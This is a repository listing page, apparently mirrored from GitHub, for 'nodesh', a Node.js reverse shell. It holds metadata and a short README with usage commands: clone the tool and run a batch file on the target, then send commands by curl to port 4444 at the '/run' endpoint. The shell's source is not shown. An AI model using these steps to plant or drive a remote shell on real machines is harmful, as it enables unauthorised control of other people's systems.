https://github.com/miguelzacca/nodesh
Nodejs reverse shell
https://github.com/miguelzacca/nodesh
Last synced: 2 months ago
JSON representation
Nodejs reverse shell
- Host: GitHub
- URL: https://github.com/miguelzacca/nodesh
- Owner: miguelzacca
- License: mit
- Created: 2024-06-12T03:00:36.000Z (about 1 year ago)
- Default Branch: main
- Last Pushed: 2024-06-24T04:52:51.000Z (12 months ago)
- Last Synced: 2025-02-15T17:41:31.308Z (4 months ago)
- Language: JavaScript
- Homepage:
- Size: 10.7 KB
- Stars: 1
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# nodesh
Nodejs reverse shell.
## Use
Target:
```bash
git clone https://github.com/miguelzacca/nodesh.git
./nodesh/nodesh.bat
```## Controller (curl or others, ex: Postman):
curl:
```bash
curl :4444/run --json '{"cmd":""}'
```